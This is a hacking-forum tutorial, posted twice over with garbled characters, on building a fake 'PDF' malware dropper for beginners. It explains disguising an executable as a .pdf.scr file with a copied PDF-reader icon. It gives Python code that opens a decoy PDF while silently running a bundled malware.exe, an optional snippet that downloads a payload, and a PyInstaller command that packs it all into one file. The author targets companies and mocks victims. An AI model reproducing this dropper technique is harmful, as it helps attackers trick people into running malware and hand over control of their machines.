jay02452
Platform Insights Analyst
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
400 XP
Have fun guys
Link:
TUTOβIAL
βββ βββββ BEGINNERS SIMPLE MALWARE IN "PDF FILE" ββββββ ββ
ΰΉβ¬β¬β¬β Forewords ββ¬β¬β¬ΰΉ
I created this tutorial because I remember when LTT (LinusTech Tips) got hacked with a fake PDF file, it's so strange how a guy that likes high techs and got some good computer science skills can just fall into this trap. Same for the hack of twitter in 2020 by a teenager, just a simple phishing. I understood at this moment that I underestimated the power of social engineering and that we can really hack big things with...
ΰΉβ¬β¬β¬β Introduction ββ¬β¬β¬ΰΉ
Ooohh, PDF and document. Maybe the best way to deliver malware : it's simple, every people can open, it's well known and used by all companies. Before we had some exploit working with specific PDF reader such as Adobe Acrobat reader for example CVE-2009-0658, all these exploit are now outdated so we had .doc macro that are now outdated too, and lately Follina RCE exploit (CVE-2022-30190) which can still be exploited since the patch is really new, and other exploits that get patched really fast. Even me, I searched many ways to deliver malware by a backdoor, a document, even a picture Big Grin . Nowadays without a good 0 day it's hard to get people with these old exploit but there is one thing that can't be outdated : Our brain. Yes, the social engineering. In this tutorial we won't use any exploit but make a simple but realistic pdf.scr.
ΰΉβ¬β¬β¬β Let's get started ββ¬β¬β¬ΰΉ
First of all what is a ".pdf.scr"? .scr is just the extension of Windows screensavers, it was basically for video and animation to be used as screensaver but it can work with any exe in fact. As for ".pdf", is just a part of the program name, only the last dot count. For example you can have "catgirls.txt.docx.pdf", this is obviously a pdf file, this stuff is called extension spoofing.
But you may ask what's the point? Well, Windows with normal settings hide known extension for example ".exe", so you can simply name a file catgirls.pdf.exe, but since Windows know exe it will hide this extension and only shows PDF wat . But on mouse hover, you will realize that this is not a pdf file (but most of people don't know what a .scr file is). But that's the problem we are human, and not devices, this is social engineering. How to make this more realistic? We can simply put the PDF reader icon, and most of (stupid?) people will double click Cool , and the malware will be exec. One of the problem is that we don't know the PDF reader that use the target, so we can't put the exact icon. For most of Windows 10 user they just keep the basic Microsoft Edge embed PDF reader, and for people who always use PDF and know well the icon this can be a problem....
Now I imagined a scenario when you deliver this kind of malware to a company, but you don't want them to know they got hacked (because indeed, for the moment the PDF seems not to open because there is only the malware, stupid one will think the PDF is broken other will realize that they got hacked). We can simply make that malware drop / open a real PDF file! That's exactly what we will do in the tutorial a pdf.scr file with PDF ico opening a real PDF.
So create your own test PDF, and let's get into it.
ΰΉβ¬β¬β¬β Python program example ββ¬β¬β¬ΰΉ
Since this a tutorial is for newbie, and I want to keep it simple & friendly we will use Python.
First of all we will need the malware itself and I won't write one from scratch for this tutorial, even during my tests I didn't use a whole malware, just a simple C# reverse shell. Since we want it to be realistic (50mb PDF sadly don't exist Sad ) we can make a light program that will download the malware and open the PDF, you can check my post on the simple FUD C# reverse shell to get a simple test program.
Code:
import os
import time
import sys
import subprocess
scriptpath = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__))) # Getting the script dir, because yes during the execution the script is the %temp% directory in a specific folder named "_MEIPASS+randomnumber"
malware = os.path.join(script_dir, 'malware.exe') # Your malware directory from the script dir defined above will show a code if you want to download it from internet, make sure you put the right name
pdf = os.path.join(script_dir, 'partnership2023.pdf') # Same for pdf make sure you put the right name
os.system(pdf) #We open PDF and will crash if there is an error
subprocess.Popen(malware, shell=True) #We exec the malware without stopping the flow of the program
#Omg guess what, that it's
This is a really basic implementation of the program if you want to make the program download and then exec you can just add these lines before the execution, easiest way is to use urllib:
Code:
import urllib.request
malwareurl = "
.exe"
downloadpath = "Updater.exe"
urllib.request.urlretrieve(malwareurl, downloadpath) # no need comment urllib is simply magic
Now we have our simple working code, and we can now use py2exe or pyinstaller. I personally like auto-py-to-exe which is just a UI for Pyinstaller, there is every Pyinstaller option it's simple and fast Wink . you can install it and run by :
Code:
pip install auto-py-to-exe && auto-py-to-exe
Since it's with UI, I won't explain more how to pack in into an exe it's really simple you can even set any languages (see next part for "-i" arg)
But the most important thing is maybe --add-data, in the additional-file part you will put your malware exe and the PDF file with the exact name you set into the Python file (You will directly find these file in the "MEIPASS_" folder during the program execution).
Anyway, here is the Pyinstaller command I got
Code:
pyinstaller --noconfirm --onefile --windowed --icon "C:/Users/censored/censored/pdf.ico" --name "partnership2023.pdf" --upx-dir "C:/Users/censored/censored/UPX/ --clean --add-data "C:/Users/censored/Desktop/project/PDF_skid/partnership2023.pdf;." --add-data "C:/Users/censored/Desktop/project/PDF_skid/malware.exe;." "C:/Users/censored/Desktop/project/PDF_skid/script.py"
Use UPX to make the final exe smaller, in a real life scenario I would make a C# program that download and exec the malware in less than 10 mb with + UPX:
Code:
/p:EnableCompressionInSingleFile=true /p:PublishTrimmed=true
to make sure it's small as possible, keep in mind that python code is only for testing purpose.... I might release here a final C# code for it.
ΰΉβ¬β¬β¬β Getting realistic icons ββ¬β¬β¬ΰΉ
Pyinstaller give the option to choose the ico file, and we need THAT ONE PDF READER ICON, I didn't find the "Official Microsoft Edge PDF reader ico" on internet so I just give the one I extracted myself from edge app :
.ico can have multiple shapes depending the resolution for better optimization, this one do it perfectly
You may more understand by a picture:
[Image: resolution-changes.png]
As you can see at the left is a normal ico with a single res, the second one is the official one that increase the readability even with small resolution by making the writing "PDF" bigger.
Now, can you see the difference between these 2 files?
[Image: realistic.png]
Yes you do but your victim won't
Once you downloaded and add this ico path to your Pyinstaller command, you just click "CONVERT .PY TO .EXE" wait approx 2 min, open the output folder rename in .scr, and we done...
ΰΉβ¬β¬β¬β Conclusion / making real life scenario ββ¬β¬β¬ΰΉ
Now you might realize one issue, when we open the exe, if the PDF reader is Microsoft edge we clearly see the path of the PDF, a kinda suspicious path (MEIPASS_ folder) because we notice that it's not where we opened the PDF.
To avoid this, the idea would be to copy the PDF file into the actual exe dir, and make the exe hide itself and finally open the PDF, you want the code? Well I won't give and it still have some bug. It's your turn to figure it out!
Anyway we got a fake pdf (scr file) that open a real pdf, that's already nice! There is other way such as lnk file, which is kinda the same idea. Using this way you can in fact spoof any extensions and make open a real file, for example : .docx, .xls, txt, png & jpg the thing is that some program got icons that changed a lot during time like Microsoft Word and remember that you don't know what software use your target.
Keep in mind I put a lot of effort even in a basic tutorial like this so please comment and tell / ask / react.
β]Β·β¦Β·Β» Thank for reading! «·β¦Β·[βΊ
Link:
TUTOβIAL
βββ βββββ BEGINNERS SIMPLE MALWARE IN "PDF FILE" ββββββ ββ
ΰΉβ¬β¬β¬β Forewords ββ¬β¬β¬ΰΉ
I created this tutorial because I remember when LTT (LinusTech Tips) got hacked with a fake PDF file, it's so strange how a guy that likes high techs and got some good computer science skills can just fall into this trap. Same for the hack of twitter in 2020 by a teenager, just a simple phishing. I understood at this moment that I underestimated the power of social engineering and that we can really hack big things with...
ΰΉβ¬β¬β¬β Introduction ββ¬β¬β¬ΰΉ
Ooohh, PDF and document. Maybe the best way to deliver malware : it's simple, every people can open, it's well known and used by all companies. Before we had some exploit working with specific PDF reader such as Adobe Acrobat reader for example CVE-2009-0658, all these exploit are now outdated so we had .doc macro that are now outdated too, and lately Follina RCE exploit (CVE-2022-30190) which can still be exploited since the patch is really new, and other exploits that get patched really fast. Even me, I searched many ways to deliver malware by a backdoor, a document, even a picture Big Grin . Nowadays without a good 0 day it's hard to get people with these old exploit but there is one thing that can't be outdated : Our brain. Yes, the social engineering. In this tutorial we won't use any exploit but make a simple but realistic pdf.scr.
ΰΉβ¬β¬β¬β Let's get started ββ¬β¬β¬ΰΉ
First of all what is a ".pdf.scr"? .scr is just the extension of Windows screensavers, it was basically for video and animation to be used as screensaver but it can work with any exe in fact. As for ".pdf", is just a part of the program name, only the last dot count. For example you can have "catgirls.txt.docx.pdf", this is obviously a pdf file, this stuff is called extension spoofing.
But you may ask what's the point? Well, Windows with normal settings hide known extension for example ".exe", so you can simply name a file catgirls.pdf.exe, but since Windows know exe it will hide this extension and only shows PDF wat . But on mouse hover, you will realize that this is not a pdf file (but most of people don't know what a .scr file is). But that's the problem we are human, and not devices, this is social engineering. How to make this more realistic? We can simply put the PDF reader icon, and most of (stupid?) people will double click Cool , and the malware will be exec. One of the problem is that we don't know the PDF reader that use the target, so we can't put the exact icon. For most of Windows 10 user they just keep the basic Microsoft Edge embed PDF reader, and for people who always use PDF and know well the icon this can be a problem....
Now I imagined a scenario when you deliver this kind of malware to a company, but you don't want them to know they got hacked (because indeed, for the moment the PDF seems not to open because there is only the malware, stupid one will think the PDF is broken other will realize that they got hacked). We can simply make that malware drop / open a real PDF file! That's exactly what we will do in the tutorial a pdf.scr file with PDF ico opening a real PDF.
So create your own test PDF, and let's get into it.
ΰΉβ¬β¬β¬β Python program example ββ¬β¬β¬ΰΉ
Since this a tutorial is for newbie, and I want to keep it simple & friendly we will use Python.
First of all we will need the malware itself and I won't write one from scratch for this tutorial, even during my tests I didn't use a whole malware, just a simple C# reverse shell. Since we want it to be realistic (50mb PDF sadly don't exist Sad ) we can make a light program that will download the malware and open the PDF, you can check my post on the simple FUD C# reverse shell to get a simple test program.
Code:
import os
import time
import sys
import subprocess
scriptpath = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__))) # Getting the script dir, because yes during the execution the script is the %temp% directory in a specific folder named "_MEIPASS+randomnumber"
malware = os.path.join(script_dir, 'malware.exe') # Your malware directory from the script dir defined above will show a code if you want to download it from internet, make sure you put the right name
pdf = os.path.join(script_dir, 'partnership2023.pdf') # Same for pdf make sure you put the right name
os.system(pdf) #We open PDF and will crash if there is an error
subprocess.Popen(malware, shell=True) #We exec the malware without stopping the flow of the program
#Omg guess what, that it's
This is a really basic implementation of the program if you want to make the program download and then exec you can just add these lines before the execution, easiest way is to use urllib:
Code:
import urllib.request
malwareurl = "
You must upgrade your account or reply in the thread to view hidden text.
downloadpath = "Updater.exe"
urllib.request.urlretrieve(malwareurl, downloadpath) # no need comment urllib is simply magic
Now we have our simple working code, and we can now use py2exe or pyinstaller. I personally like auto-py-to-exe which is just a UI for Pyinstaller, there is every Pyinstaller option it's simple and fast Wink . you can install it and run by :
Code:
pip install auto-py-to-exe && auto-py-to-exe
Since it's with UI, I won't explain more how to pack in into an exe it's really simple you can even set any languages (see next part for "-i" arg)
But the most important thing is maybe --add-data, in the additional-file part you will put your malware exe and the PDF file with the exact name you set into the Python file (You will directly find these file in the "MEIPASS_" folder during the program execution).
Anyway, here is the Pyinstaller command I got
Code:
pyinstaller --noconfirm --onefile --windowed --icon "C:/Users/censored/censored/pdf.ico" --name "partnership2023.pdf" --upx-dir "C:/Users/censored/censored/UPX/ --clean --add-data "C:/Users/censored/Desktop/project/PDF_skid/partnership2023.pdf;." --add-data "C:/Users/censored/Desktop/project/PDF_skid/malware.exe;." "C:/Users/censored/Desktop/project/PDF_skid/script.py"
Use UPX to make the final exe smaller, in a real life scenario I would make a C# program that download and exec the malware in less than 10 mb with + UPX:
Code:
/p:EnableCompressionInSingleFile=true /p:PublishTrimmed=true
to make sure it's small as possible, keep in mind that python code is only for testing purpose.... I might release here a final C# code for it.
ΰΉβ¬β¬β¬β Getting realistic icons ββ¬β¬β¬ΰΉ
Pyinstaller give the option to choose the ico file, and we need THAT ONE PDF READER ICON, I didn't find the "Official Microsoft Edge PDF reader ico" on internet so I just give the one I extracted myself from edge app :
You must upgrade your account or reply in the thread to view hidden text.
You may more understand by a picture:
[Image: resolution-changes.png]
As you can see at the left is a normal ico with a single res, the second one is the official one that increase the readability even with small resolution by making the writing "PDF" bigger.
Now, can you see the difference between these 2 files?
[Image: realistic.png]
Yes you do but your victim won't
Once you downloaded and add this ico path to your Pyinstaller command, you just click "CONVERT .PY TO .EXE" wait approx 2 min, open the output folder rename in .scr, and we done...
ΰΉβ¬β¬β¬β Conclusion / making real life scenario ββ¬β¬β¬ΰΉ
Now you might realize one issue, when we open the exe, if the PDF reader is Microsoft edge we clearly see the path of the PDF, a kinda suspicious path (MEIPASS_ folder) because we notice that it's not where we opened the PDF.
To avoid this, the idea would be to copy the PDF file into the actual exe dir, and make the exe hide itself and finally open the PDF, you want the code? Well I won't give and it still have some bug. It's your turn to figure it out!
Anyway we got a fake pdf (scr file) that open a real pdf, that's already nice! There is other way such as lnk file, which is kinda the same idea. Using this way you can in fact spoof any extensions and make open a real file, for example : .docx, .xls, txt, png & jpg the thing is that some program got icons that changed a lot during time like Microsoft Word and remember that you don't know what software use your target.
Keep in mind I put a lot of effort even in a basic tutorial like this so please comment and tell / ask / react.
β]Β·β¦Β·Β» Thank for reading! «·β¦Β·[βΊ